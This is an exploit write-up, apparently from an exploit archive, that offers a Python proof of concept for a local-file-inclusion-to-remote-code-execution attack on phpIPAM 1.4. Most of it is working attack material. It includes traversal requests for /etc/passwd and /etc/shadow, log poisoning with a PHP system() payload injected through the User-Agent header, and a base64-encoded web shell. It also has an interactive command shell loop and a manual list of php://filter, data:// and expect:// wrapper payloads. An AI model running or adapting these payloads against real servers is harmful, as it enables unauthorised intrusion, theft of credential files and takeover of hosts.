phpIPAM 1.4 LFI to RCE Exploit


=============================================================================================================================================
| # Title     : phpIPAM 1.4 LFI to RCE Exploit
                                                                    |
| # Author    : indoushka
                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2
(64 bits)                                                            |
| # Vendor    : https://github.com/phpipam/phpipam/blob/master/index.php
                                                                  |

=============================================================================================================================================

[+] Summary : A critical Local File Inclusion (LFI) vulnerability exists
in phpIPAM's main index.php file due to insufficient input validation
              when including page files. Attackers can exploit this to
read sensitive system files, potentially escalate to Remote Code Execution
(RCE),
                        and gain complete control of the server.


[+]  POC : python poc.py

#!/usr/bin/env python3
"""
phpIPAM LFI to RCE Exploit
"""

import requests
import sys
import urllib.parse

class phpIPAM_Exploit:
    def __init__(self, target):
        self.target = target.rstrip('/')
        self.session = requests.Session()

    def check_lfi(self, path):
        """اختبار تضمين الملفات"""
        params = {'page': path}
        response = self.session.get(f"{self.target}/index.php",
params=params)
        return response

    def exploit_proc_self_environ(self):
        """استغلال /proc/self/environ"""
        print("[*] Testing /proc/self/environ LFI...")

        # أولاً: حقن PHP في User-Agent
        headers = {
            'User-Agent': '<?php system($_GET["cmd"]); ?>'
        }

        response = self.session.get(self.target, headers=headers)

        # ثانياً: تضمين ملف السجل
        log_paths = [
            '/var/log/apache2/access.log',
            '/var/log/httpd/access_log',
            '/var/log/nginx/access.log',
            '/proc/self/environ',
            '/proc/self/fd/0'
        ]

        for path in log_paths:
            print(f"[*] Trying {path}...")
            response = self.check_lfi(f"../../../../{path}")

            if 'PHP' in response.text or 'php' in response.text:
                print(f"[+] Possible LFI found: {path}")

                # اختبار تنفيذ الأوامر
                cmd_response = self.session.get(
                    f"{self.target}/index.php",
                    params={'page': f'../../../../{path}', 'cmd':
'whoami'}
                )

                if cmd_response.status_code == 200:
                    print("[+] RCE successful!")
                    return True

        return False

    def upload_and_include(self, php_code):
        """رفع وتضمين ملف مؤقت (إذا كان هناك رفع ملفات)"""
        # هذا يتطلب ثغرة رفع ملفات أيضًا
        print("[*] Trying to upload and include PHP file...")

        # PHP shell base64 encoded
        shell = "<?php echo
base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4='); ?>"

        # محاولة تضمين ملفات /tmp
        tmp_files = [
            '/tmp/sess_*',
            '/tmp/php*',
            '/tmp/upload*'
        ]

        for pattern in tmp_files:
            for i in range(100):
                filename = pattern.replace('*', str(i))
                response = self.check_lfi(f"../../../../{filename}")
                if 'uid=' in response.text or 'root' in
response.text.lower():
                    print(f"[+] Found vulnerable temp file: {filename}")
                    return filename

        return None

    def interactive_shell(self, lfi_path):
        """قشرة تفاعلية بعد الاستغلال"""
        print(f"\n[+] Interactive shell via LFI: {lfi_path}")
        print("[+] Type 'exit' to quit\n")

        while True:
            cmd = input("shell").strip()
            if cmd.lower() == 'exit':
                break

            params = {
                'page': f'../../../../{lfi_path}',
                'cmd': cmd
            }

            response = self.session.get(f"{self.target}/index.php",
params=params)

            # استخراج الناتج
            lines = response.text.split('\n')
            for line in lines:
                if line and not line.startswith(('<', '<?', '<!')) and
'html' not in line.lower():
                    print(line[:500])  # طباعة أول 500 حرف

    def run(self):
        """تشغيل الاستغلال"""
        print("[*] phpIPAM LFI/RFI Exploit")
        print(f"[*] Target: {self.target}")

        # اختبار LFI أساسي
        test_files = [
            '../../../../etc/passwd',
            '../../../../etc/hosts',
            '../../../../windows/win.ini',
            '....//....//....//....//etc/passwd',
            '..\\..\\..\\..\\windows\\win.ini'
        ]

        for test in test_files:
            print(f"[*] Testing: {test}")
            response = self.check_lfi(test)

            if 'root:' in response.text or '[extensions]' in
response.text:
                print(f"[+] LFI confirmed with: {test}")
                print(f"[+] Response preview: {response.text[:200]}")

                # استغلال مباشر
                self.interactive_shell(test.replace('../../../../', ''))
                return True

        # محاولات أخرى
        if self.exploit_proc_self_environ():
            return True

        print("[-] No LFI vulnerability found")
        return False

# استغلال يدوي
def manual_exploitation():
    print("""
=== phpIPAM LFI/RFI Manual Exploitation ===

1. Basic LFI Test:
   /index.php?page=../../../../etc/passwd
   /index.php?page=../../../../etc/shadow
   /index.php?page=../../../../windows/win.ini

2. Log Poisoning:
   # Step 1: Inject PHP into logs
   GET /index.php HTTP/1.1
   User-Agent: <?php system($_GET['cmd']); ?>

   # Step 2: Include the log file
   /index.php?page=../../../../var/log/apache2/access.log&cmd=id

3. PHP Filters (if enabled):
   /index.php?page=php://filter/convert.base64-encode/resource=config.php
   /index.php?page=php://filter/resource=/etc/passwd

4. Data URI (if allow_url_include=On):
   /index.php?page=data://text/plain,<?php phpinfo();?>

/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=

5. Expect Wrapper (rare):
   /index.php?page=expect://ls
    """)

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 phpipam_exploit.py <target_url>")
        print("Example: python3 phpipam_exploit.py
http://localhost/phpipam")
        manual_exploitation()
        sys.exit(1)

    target = sys.argv[1]
    exploit = phpIPAM_Exploit(target)
    exploit.run()


Greetings to
:=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln
(John Page aka hyp3rlinx)|

===================================================================================================